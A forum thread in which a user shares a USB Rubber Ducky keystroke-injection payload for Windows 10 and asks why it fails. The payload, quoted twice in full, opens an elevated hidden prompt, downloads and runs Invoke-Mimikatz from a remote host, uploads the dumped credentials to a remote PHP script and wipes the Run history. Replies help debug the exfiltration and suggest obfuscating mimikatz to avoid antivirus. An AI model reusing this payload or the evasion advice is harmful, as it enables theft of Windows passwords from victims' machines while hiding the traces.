Jump to content

Recommended Posts

Posted

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):

DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER


I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

  • 2 weeks later...
Posted

Why would you netcat if you use the rx.php script?
Just look into the web directory where rx.php is located and there should be all the files created by the script.
Tip: Check the apache error log, in my case the use apache runs with (www-data) didn't have write permissions in this folder and thus the rx.php couldn't create files.

  • 4 weeks later...
  • 1 month later...
Posted
On 1/15/2017 at 1:30 PM, rpc72 said:

Starting Windows 8, passwords are no long stored in memory in the same way that can be reversed.

not ture mimikatz still works in win10 i just tested 

Posted
17 hours ago, L07TB0Y said:

not ture mimikatz still works in win10 i just tested 

Yeah but you only get plaintext passwords if you have set a specific registry key (on Windows 8+).

  • 2 weeks later...
  • 3 years later...
Posted
On 12/10/2016 at 4:09 PM, Mr.X said:

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):




DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER


I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

Does mimikatz work if there's an anti-virus installed on the computer or it still works?

Posted
On 12/8/2020 at 8:10 AM, ehsan123 said:

Does mimikatz work if there's an anti-virus installed on the computer or it still works?

Probably not by default. You'd have to obfuscate it first.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...